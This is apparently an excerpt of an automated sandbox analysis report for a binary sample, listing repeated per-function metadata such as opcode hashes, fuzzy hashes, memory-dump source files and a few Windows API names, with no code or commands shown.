                                                                                                                                                                                                                                                                                                                        • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 324f0c4e3116d5739d7c89b58c5a24db218ed0c2a8bb8dce483798d4df8b739c
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9C51C211F08F1756FA64AB2F591117A6292AF88BD4F8846B5DF0EC77D6EE3CE4429300
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: HeapProcess
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 54951025-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 14844cf53d36101433e2034a08475114874d5a04f480cd3d34cd338d15b69478
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D1B09220E17B02C2EA082B29BC8222822A4BF48701F9801B8CA5CC0330EE2C24E55710
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
                                                                                                                                                                                                                                                                                                                        • Instruction ID: b4a8e2297288016c4b4f8631d64e51ebfd9d3001a75c96bac2809adb8bf30fcb
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 23D1DE66A08E6686EBA88E2D809037D37A2EF45B48F944375CF0DC7B95DF39E845C740
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 4f5bcaecd83eacc5b7641f8d958f36c4d3a2889af0b6b908958aa64b5fc5261d
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 96C19E762181E08BD68AEB29E47947A73E1F78930DB95406BEF87877C5CB3CA414DB10
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 616b9e384718e3bac83132c3acf9490e7e3e037eaef6b4c67f9d1a8bf2ffd832
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DFB15A72A08B8585E7658F6DC09023C3BA6EB49B48FA443BACF4EC7395CF29D442C745
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 35b95c8e1e60802b0913aa5e425425e6551c1bd3787030755f2764416c6af905
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E81C272A08B8146E7B4CB2D949536A7A92FB45794FA44375DF9DC3B99DF3CE4008B00
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 15e29a2b048034b7d11d1b87b7baa88ea743f66ca2db996e50da050e1c2114ce
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 899b194a2ddcc5b3b21920fae936877668724305ba1c0ffd3d93963660d10bc4
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 15e29a2b048034b7d11d1b87b7baa88ea743f66ca2db996e50da050e1c2114ce
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B161C332E187A246FBA48A6C985067D6A91AF40760F6452B9DF1DC7BC5FF7DE8808700
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 5d4411b6678a8e61d7807e73298694d041b8bb8038bab55770c7dba86060ca67
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DE516076A18E5186E7248B2DD04433837A2EB45B68F645272CF8DD77A4DF3AE853C780
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 57a3928ff34bc83a69ea96a146c08b8d06b4d1c4fcbe81b54362b590c0d89fba
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 41517036A18A5586E7648B6DD48422837A2EB58B58F644371DF4DCB7A4CF3AE843C740
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 9e7adead780bb3059d4d643bde2b3c8c8892e16515e89cf1e60d331aca6122c0
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 00516E36A18A5182E7648B2DC04037937A2EB45B68F644376CF4DD7794CF3AE853C740
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 91db0d3546a9e6734d809bb70b443ed27fd26c70907ce2f74b21cfa8f0419f54
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C8517D36A18A51C6E7248B2DC04033927A2EB45B58FA452B2CF4DD7798DF3AE893C740
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                                                                                                        • Instruction ID: e8b48919a35d4a9b2df72110e9a0b629d03770d509b1a43fb36fe1d626073f5b
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4D518F36A18E5186E7648B2DC04033977A2EB49B58FA44272CF4DD7798CF3AE843C780
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 4689605720a2d86daaf48e6f8c2e22e0b6c491f9f468f5b12107ba7166bcce3a
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 96517236A18E5586E7248B2DC08433867A2EB49B58F644372DF4DD77A5DF3AE843C740
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 6ecee38f05c1b909041dd6eae2facd6e54647a74e649516f97b539aea721b4f7
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BD418262C0EF8A05E9A9891C05186B82A829F62BA1DD853F8DF9FD73D7CD1D6587C300
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 485612231-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 962f6c69d486470c60afb243670b36fa074c080c2d0471f4c161844b2be1e0b0
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D41D022B14E5586EF04CF2AD924169B3A2BB48FD0B59A136EF4DD7B58DE3DD0428300
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
